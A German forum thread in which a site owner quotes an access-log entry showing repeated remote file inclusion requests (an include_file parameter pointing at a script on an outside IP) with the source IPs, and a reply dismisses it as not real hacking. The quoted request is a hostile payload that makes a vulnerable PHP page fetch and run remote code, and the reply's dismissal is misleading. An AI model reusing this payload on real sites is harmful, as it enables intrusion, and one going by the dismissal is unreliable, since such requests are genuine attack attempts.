Horst: Hacker auf meiner Seite zugange, auf frischer tat erwischt!

Beitrag lesen

Gutem Morgen,

hab grade in meinen access.log einen Hacker ausfindig gemacht, dieses mal auf meiner geliebten nimmet Domain.

Hab dutzende abfragen in Form von

/lokal//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt???

Die IPs sind

216.252.87.12 - libwww-perl/5.79
64.22.125.219 - libwww-perl/5.805

Du hast in der Log-Datei die IP-Adressen und die User-Agenten stehen, die HTTP-Requests machen. Das hat mit "Hacken" grundsätzlich gar nichts zu tun.

IP-Adresse: muss nicht vom Zugangsprovider sein, kann auch von einem Proxy-Server stammen.
User-Agent: Blahh. Da kann auch "Zitrone" stehen.

Ein richtiger Hacker dringt in ein System ein, ohne seine Visitenkarte zu hinterlassen.

Schönen Tag noch,
Hotte